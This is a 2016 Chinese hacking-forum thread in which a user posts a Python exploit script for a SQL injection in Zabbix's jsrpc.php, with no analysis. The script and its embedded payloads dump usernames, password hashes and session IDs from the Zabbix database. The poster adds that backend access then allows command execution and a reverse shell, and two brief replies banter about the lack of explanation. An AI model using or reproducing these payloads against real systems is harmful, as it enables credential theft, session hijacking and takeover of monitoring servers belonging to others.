wuyan 发表于 2016-8-18 18:11:17

zabbix注入利用脚本

本帖最后由 wuyan 于 2016-8-18 19:27 编辑

没什么好讲的,分析的文章页不想写了,就是insert注入。

#/usr/bin/python
#*-*coding=utf-8*-*
import requests
import re
import sys
'''
===getpass payloads===
1./jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 1 from (select count(*),concat(floor(rand(0)*2), (select concat(alias,0x3a,passwd) from zabbix.users limit 1,1))x from information_schema.character_sets group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=showlatest&filter=&filter_task=&mark_color=1
2./jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
===session 获取===
1./jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,sessionid,0x7e))+from+sessions+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
'''

def getpass(url,num):
        payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&\
        hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
                (rand(0)*2), (select concat(0x7e,0x7e,alias,0x3a,passwd,0x7e,0x7e) from users limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=\
showlatest&filter=&filter_task=&mark_color=1' % str(num)
        tempurl = url + payloads
        response = req = requests.get(tempurl).content
        return response

def filter(content):
        try:
                result = re.findall(r"~~(.*?)~~",content)
                print result
                return True
        except Exception, e:
                return False

def getsession(url,num):
        payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&\
        hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
                (rand(0)*2), (select concat(0x7e,0x7e,sessionid,0x7e,0x7e) from sessions limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=\
showlatest&filter=&filter_task=&mark_color=1' % str(num)
        tempurl = url + payloads
        response = req = requests.get(tempurl).content
        return response

def usage():
    print "   usage1:        python zabbix.py xxx.com passwd"
    print "   usage2:       python zabbix.py xxx.com session\n"
if __name__ == '__main__':
        logo = '''\n
       _____   _   _   _      _____         _   
        |__/__ _| |__ | |__ (_)__|___|   ____| | __
          / // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
       / /| (_| | |_) | |_) | |><|_|| |_| | (__|   <
        /____\__,_|_.__/|_.__/|_/_/\_\_|   \__,_|\___|_|\_\
       
        \n**************coded by bsmali4 2016-8-16*****************
        '''
        print logo
        if len(sys.argv) != 3:
                usage()
        else:
                host = sys.argv.strip('/')
                method = sys.argv
                if method == 'passwd':
                        for i in range (0,999):
                                response = getpass(host,i)
                                if not filter(response):
                                        break
                elif method == 'session':
                        for i in range(0,999):
                                response = getsession(host,i)
                                if not filter(response):
                                        break
       


登陆后台后可以直接执行命令,反弹shell什么的是极好的

冰琥珀 发表于 2016-8-19 14:21:57

这样真的好么,信不信我也直接丢个汇编代码然后说没啥好写的;P

No0d1es 发表于 2016-8-20 09:59:52

卧槽,居然没人来捧场。
页: [1]
查看完整版本: zabbix注入利用脚本